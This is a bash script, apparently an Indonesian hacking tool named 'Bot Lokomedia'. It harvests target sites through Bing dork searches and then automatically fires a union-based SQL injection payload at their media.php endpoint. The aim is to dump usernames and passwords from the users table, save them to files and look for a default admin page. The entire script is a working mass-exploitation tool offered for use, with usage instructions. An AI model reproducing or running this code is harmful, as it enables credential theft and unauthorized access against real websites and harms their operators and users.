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- #!/bin/bash
- # c0ded by : shutdown57
- # powered by
- m="\e[0;31m" # merah
- k="\e[0;33m" # kuning
- h="\e[0;32m" # hijau
- b="\e[0;34m" # biru
- lm="\e[1;31m" # merah terang
- lk="\e[1;33m" # kuning terang
- lh="\e[1;32m" # hijau terang
- lb="\e[1;34m" # biru terang seterang masa depan kita.
- n="\e[0m" # clear / netral
- w="\e[1;37m" # putih tebal
- xSimpanPacar(){
- touch $2
- chmod 777 $2
- echo $1 >> $2
- }
- xSimpanan(){
- mkdir OutputxS57 > /dev/null 2>&1
- chmod 777 OutputxS57
- touch OutputxS57/readme.txt
- echo "-[ shutdown57 ]-" > OutputxS57/readme.txt
- local uvuv=$(date +"%H%m%s")
- local name="OutputxS57/$uvuv-$1.txt"
- touch $name
- echo "+-[ INFO ]-+" >> $name
- echo "Site : $1 " >> $name
- echo $2 >> $name
- echo "+-[ END ]-+" >> $name
- local cekfile=$(cat $name)
- if [[ -f $name && $cekfile != "" ]]; then
- xS57s " Result saved to : $name !"
- else
- xS57f " Failed Save Result :("
- echo $2
- echo "-----------------------"
- fi
- }
- bingDork(){
- local curl=`curl "${2}&first=${1}1" -s`
- local gets=$(echo $curl | grep -Po "(?<=<h2><a href=\")[^\"]*")
- xS57i "-[ INFO ]-"
- xS57i "Dork : "$2
- xS57i "Page : "$1
- xS57i "R u n n i n g . . . ."
- for geturl in $gets
- do
- IFS="/" read -r -a url <<< "$geturl"
- xS57s ${url[2]}
- xSimpanPacar ${url[2]} $3
- done
- }
- FindAdminLokmed(){
- local adminpage="adminweb/"
- local ceklo=$(curl -s --connect-timeout 10 ${1}/$adminpage -D -)
- if [[ $ceklo =~ "200 OK" ]]; then
- xS57s "Found Default Adminpage : ${1}/$adminpage !"
- else
- xS57d "Not Found Default Adminpage :( ."
- fi
- }
- ExploitX(){
- injectable="/media.php?module=detailberita&id=.169+'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x23,username,0x3a574f533a,password,0x3c62723e)),@)--+"
- buaturi="${1}/${injectable}"
- cekhead=$(curl -s $buaturi --head)
- xS57i "I n j e c t i n g . . ."
- if [[ $cekhead =~ "200" ]]; then
- curl -s $buaturi | grep "WOS" > /dev/null 2>&1
- if [[ $? -eq 0 ]]; then
- xS57s "${1} -> INJECTED !"
- up=$(curl -s "${buaturi}" | grep -Po "(\#.*:WOS:.*\#)" | sed -e 's/:WOS:/Username:Password/g')
- xS57i "Getting Username & Password . . ."
- xSimpanan $1 $up
- xSimpanPacar $buaturi "result.txt"
- xS57i "Trying Find Default adminpage . . ."
- FindAdminLokmed $1
- else
- xS57d "${buaturi} -> FAILED"
- fi
- else
- xS57f "${1} -> ERROR ! | Detected WAF"
- fi
- }
- xS57i(){
- echo -e "${lb}[i] ${n} ${1}"
- }
- xS57t(){
- echo -e -n "${h}[?] ${n} ${1}"
- read $2
- }
- xS57f(){
- echo -e "${lm}[!] ${n} ${1}"
- }
- xS57d(){
- echo -e "${k}[!] ${n} ${1}"
- }
- xS57s(){
- echo -e "${lh}[+] ${n} ${1} "
- }
- InjectLokmed(){
- listsite=`cat $1`
- site=$(echo $listsite | tr "\n" "\n")
- for si in $site
- do
- xS57i "Checking ${si}/media.php?module=home for Exploit ..."
- local cek=$(curl -s --connect-timeout 10 ${si}/media.php?module=home -D -)
- if [[ $cek =~ "HTTP/1.1 200 OK" ]]; then
- xS57s "${si}/media.php?module=home -> 200 OK !"
- ExploitX $si
- else
- xS57d "${si}/media.php?module=home -> Not Vuln !"
- fi
- done
- }
- BannerxS57(){
- clear
- printf "${lk}
- ${lh} *${lk}
- ${lh} * *${lk}
- _ _ _ ___ ___${lh}* * *${lk}
- ___| |_ _ _| |_ _| |___ _ _ _ ___| _|_ |${n} |${lk}
- |_ -| | | | _| . | . | | | | |_ | | |${n} |${lk}
- |___|_|_|___|_| |___|___|_____|_|_|___| |_|${n} |${lh}
- x-------------------------------------------X${n}
- X${lb} Bot Lokomedia xXx copyright (c) 2017${n} XxXx
- x-|${lm} powered by${w} ${n}|----------X
- "
- }
- if [[ $1 == "" && $2 == "" && $3 == "" ]]; then
- BannerxS57
- printf "
- Cara Menggunakan :
- $0 <dork> <NumPage> <SaveAs>
- Contoh Penggunaan :
- $0 'semua-berita.html' '10' 'result.txt'
- "
- else
- BannerxS57
- for (( i = 0; i < $2; i++ )); do
- bingDork $i $1 $3 | tee -a BotLokomedia.log
- done
- InjectLokmed $3 | tee -a BotLokomedia.log
- fi
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